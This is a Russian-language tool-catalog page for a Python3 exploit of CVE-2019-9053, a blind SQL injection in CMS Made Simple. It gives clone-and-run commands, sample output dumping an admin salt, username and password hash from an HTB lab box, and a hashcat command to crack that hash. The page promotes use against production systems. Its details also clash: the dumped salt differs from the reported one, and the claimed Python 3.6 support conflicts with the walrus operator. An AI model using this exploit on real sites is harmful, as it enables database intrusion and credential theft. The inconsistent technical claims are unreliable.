Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/tim-karov/cmsms-sqli
Взлом паролейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на Проникновение
GitHubtim-karov/cmsms-sqli

cmsms-sqli

Эксплойт Python3 для CVE-2019-9053 (CMS Made Simple <= 2.2.9 SQLi). Без зависимостей, time-based blind SQLi → дамп админских кредов. HTB Writeup owned.

Репозиторий
57 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CMS Made Simple <= 2.2.9 SQL-инъекция (CVE-2019-9053) - Эксплойт на Python3

Чистый порт на Python3 оригинального эксплойта Exploit-DB #46635 от Daniele Scanu. Time-based blind SQLi для извлечения учётных данных администратора из уязвимых установок CMS Made Simple.

🎯 Возможности:

✅ Нет внешних зависимостей (только requests)

✅ Нативный Python 3.6+ (f-strings, walrus operator)

✅ Красивый цветной вывод (ANSI)

✅ Стабильный и быстрый (~3-5 мин дамп при средних соединениях)

✅ Обработка таймаутов/ошибок для целевых систем в production

✅ Вывод, готовый для Hashcat (соль + формат MD5)

🚀 Использование:

root@kitploit:~
# Clone & run
git clone https://github.com/tim-karov/cmsms-sqli
cd cmsms-sqli
python3 cmsms-sqli.py url
root@kitploit:~
# Example output (HTB Writeup):
[+] CVE-2019-9053 CMS Made Simple SQLi (Python3)
[+] Target: http://machine_ip/writeup/moduleinterface.php?mact=News,m1_,default,0
[+] Dumping SALT...
5a599ef579066807
[+] Salt: L7b8v5p3
[+] Dumping USERNAME...
jkr
[+] Username: jkr
[+] Dumping PASSWORD MD5...
62def4866937f08cc13bab43bb14e6f7
[+] MD5 Hash: 62def4866937f08cc13bab43bb14e6f7
[+] Crack: hashcat -a 0 -m 20 '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' /usr/share/wordlists/rockyou.txt

🔧 Настройка:

root@kitploit:~
TIME = 3      # Sleep time (slower = more stable)
timeout = 20  # Request timeout
chars = '...' # Custom charset

📝 Авторы:

Оригинальный автор: Daniele Scanu

Exploit-DB: #46635

Порт на Python3 и улучшения: Tim Karov

📄 Лицензия:

Лицензия MIT - См. LICENSE


⭐ Поставьте звезду, если полезно! Используется в лабораториях HTB/TryHackMe и реальных пентестах.

Скачать инструмент